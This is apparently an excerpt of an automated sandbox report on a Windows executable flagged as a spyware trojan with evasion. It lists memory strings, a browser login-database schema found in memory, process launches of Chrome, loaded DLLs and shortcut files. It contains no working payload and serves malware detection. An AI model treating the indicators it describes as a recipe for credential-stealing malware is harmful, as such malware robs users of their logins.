        Source: file.exe, 00000000.00000003.2315055148.00000000060E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2305917129.0000000005DD4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2313971921.00000000060EC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2309274862.00000000060E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2315317920.00000000062E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2320230640.000000000634F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2316607082.00000000061F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2317612187.00000000061F3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2318578471.0000000006210000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2319692209.000000000620C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2312617478.00000000062B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2320376946.00000000060E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2321407006.00000000060E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2317492165.00000000060E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2312253006.00000000060EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2307591941.0000000006184000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2307994855.00000000060EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2313728351.00000000061E0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2309739853.00000000060E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2312776457.00000000060F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2315184432.00000000061DE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2304110586.0000000005E2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2307690969.00000000060EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2319348649.0000000006204000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2309123837.000000000624D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2315458034.00000000060E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2316089762.00000000060E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2322401411.0000000006230000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2320782535.000000000621B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2320944629.0000000006357000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2308356839.0000000006225000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2311487645.00000000060E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2305754805.0000000005EAB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2315719533.00000000062EF000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2307044308.0000000005F45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2317959649.00000000061F5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2321894937.000000000637F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2309046350.0000000006195000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2315831065.00000000060EA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2319542216.00000000060E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2318360813.00000000060ED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2308266818.0000000006182000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2322888595.0000000006233000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2313351751.00000000061D2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2305571118.0000000005E3C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2312122454.00000000061CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2309459258.0000000006197000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2361637241.000000000131C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2314760376.00000000060E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2314150038.00000000061E1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2304110586.0000000005DC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2308077108.000000000619F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2306313214.0000000005E59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2319959201.00000000060E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2322552003.0000000006378000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2318150588.0000000006315000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2308467417.00000000060E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2317772597.00000000060E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2311780477.000000000629C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2305571118.0000000005DCE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2358893236.000000000131C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2310993952.000000000627A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2316733377.00000000060EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2316220546.00000000061E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2316356356.0000000006301000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2311961876.00000000060F1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2313568047.00000000060ED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2306112645.0000000005EC0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2313102476.00000000060EE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2308155958.00000000060E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2306313214.0000000005DDC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2321100369.00000000060E4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2306112645.0000000005E49000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2307494620.00000000060E9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2308864951.00000000060EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2308670041.0000000006242000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2311340710.00000000061B2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2320107337.0000000006219000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2315587504.00000000061EB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2428120797.0000000005CCE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2428120797.0000000005CCE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefO vs file.exe
        Source: file.exe, 00000000.00000002.2467509187.0000000005CCE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000002.2467509187.0000000005CCE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefO vs file.exe
        Source: file.exe, 00000000.00000003.2309989150.00000000060E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2321561762.000000000622F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2357892182.0000000005CF6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2304110586.0000000005D62000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2315962473.00000000061E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2312945160.00000000061D3000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2310863985.00000000061B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2307400844.000000000621F000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2358820127.0000000005CD7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefO vs file.exe
        Source: file.exe, 00000000.00000003.2322722079.00000000060E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2306950977.00000000060E7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2311178978.00000000060E8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2310138817.00000000061B1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2312421269.00000000061CD000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2319003422.0000000006207000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2307789578.000000000618C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2319235919.00000000060E6000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2307190535.00000000060E5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2305917129.0000000005D62000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2306551248.0000000005E59000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exe, 00000000.00000003.2304270252.0000000005E96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
        Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
        Source: file.exeStatic PE information: Section: ZLIB complexity 0.9992827868852459
        Source: file.exeStatic PE information: Section: bfltexda ZLIB complexity 0.9942121174254076
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/70@9/6
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
        Source: C:\Users\user\Desktop\file.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: file.exe, 00000000.00000003.2104054846.0000000005C49000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2103959464.0000000005C64000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: file.exeVirustotal: Detection: 51%
        Source: file.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
        Source: C:\Users\user\Desktop\file.exeFile read: C:\Users\user\Desktop\file.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1712,i,16499392452807308267,17586683353551675273,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2012,i,16342311137299287003,18054011809701615545,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
        Source: C:\Users\user\Desktop\file.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=1712,i,16499392452807308267,17586683353551675273,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2012,i,16342311137299287003,18054011809701615545,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: winmm.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: webio.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: policymanager.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: msvcp110_win.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Users\user\Desktop\file.exeSection loaded: wkscli.dllJump to behavior
        Source: Google Drive.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: YouTube.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Sheets.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
        Source: Gmail.lnk.3.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
